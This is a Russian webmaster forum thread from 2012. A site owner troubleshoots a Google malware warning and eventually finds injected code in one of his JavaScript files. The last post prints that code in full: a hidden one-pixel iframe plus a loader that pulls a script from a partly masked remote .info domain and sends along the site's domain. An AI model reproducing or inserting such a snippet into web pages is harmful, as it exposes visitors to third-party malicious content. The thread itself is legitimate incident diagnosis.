Помощник
|
Google определил вредоносное ПО на сайте, хотя его там нет! |
HanDi
|
Сообщение
#1
|
||
|
|
||
|
|||
Proofer |
13.11.2012, 18:11;
Ответить: Proofer
Сообщение
#2
|
|
|
|
|
HanDi
|
Сообщение
#3
|
|
Сайт ucoz, посему htaccess - откидываем.
Iframe отсутствуют. |
|
|
Belos |
13.11.2012, 18:21;
Ответить: Belos
Сообщение
#4
|
|
base64 ?
|
|
|
HanDi
|
Сообщение
#5
|
|
Проверил на webmaster yandex - вредоносный код отсутствует.
Помоему это что-то гугл мудрит. base64 тоже я думаю откидываем, у меня нет ничего зашифрованного в коде. + проверил все js файлы, обычно там что-то прячут. |
|
|
Belos |
13.11.2012, 18:44;
Ответить: Belos
Сообщение
#6
|
|
Но проверить то можно, что стоит то?!
Total Comander -> Alt+F7 + с текстом base64 |
|
|
HanDi
|
Сообщение
#7
|
|
Разобрался, зря гнал на гугл.
Вопрос закрыт. Всем спасибо. |
|
|
Belos |
13.11.2012, 18:48;
Ответить: Belos
Сообщение
#8
|
|
Говорите уж, в чем причина была )))
|
|
|
seowolf |
13.11.2012, 18:54;
Ответить: seowolf
Сообщение
#9
|
|
HanDi, бывают ломают хостера и закидывают массово всякие гадости, те в свою очередь как опомнятся - массово чистят все. Так что вы может прозевали шоутайм, посмотрите на время редактирования файлов через фтп. Гугль просто он шустрый малый, чуть что в барабаны, а яндекс и не успевает носом повести.
Блин, пока писал вопрос закрыли)) Итог то какой, в чем причина, ТС? Сообщение отредактировал seowolf - 13.11.2012, 18:55 -------------------- |
|
|
HanDi
|
Сообщение
#10
|
|
Дело в том, что в 1 js файле, причем по размерам в самом большом, содержался самый маленький код, в котором был еще 1 iframe с еще 1 js файлом
В общем в итоге код вредоносного ПО оказался такой: /*ffb653*/ function AddBanner(b){var a = document.createElement('iframe'); a.src = b; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '1px'; a.style.width = '1px'; a.style.left = '1px'; a.style.top = '1px'; document.body.appendChild(a);}function XRequest(data){var script=document.createElement("script");script.type="text/javascript";if(script.readyState){script.onreadystatechange=function(){if(script.readyState=="loaded"||script.readyState=="complete"){script.onreadystatechange=null;}}}else{script.onload=function(){}}script.src=data;document.getElementsByTagName("head")[0].appendChild(script)}XRequest("http://*********.info/sex/banner.php?r=1&d="+document.domain);//debug: /*/ffb653*/ Единственное не пойму, как могли загрузить этот код, если пароли не знает никто 100% и подобрать их не реально. seowolf, это маловероятно.. обычно у ucoz такого не случалось. Сообщение отредактировал HanDi - 13.11.2012, 18:55 |
|
|
|
Похожие темы
Тема | Ответов | Автор | Просмотров | Последний ответ | |
---|---|---|---|---|---|
Странный трафик на сайте длительное время | 34 | TABAK | 9069 | Вчера, 23:38 автор: Arsenwenger |
|
Если статья не в индексе Google - она уникальна или нет? | 6 | uahomka | 1586 | Вчера, 15:37 автор: Arsenwenger |
|
CryptoCloud — прием USDT, BTC, ETH, LTC на любом сайте | 37 | CryptoCLoud | 10819 | Вчера, 15:37 автор: CryptoCLoud |
|
Боты могут делать пушподписки на моём сайте? | 3 | Megaspryt | 953 | Вчера, 5:18 автор: Skyworker |
|
Быстрый и качественный обмен на сайте Baksman.org Обмен Bitcoin, BTC-e, PM, Qiwi, Yandex money, Карты банк |
53 | Baksman | 33822 | 23.4.2024, 11:29 автор: Baksman |
Текстовая версия | Сейчас: 25.4.2024, 5:20 |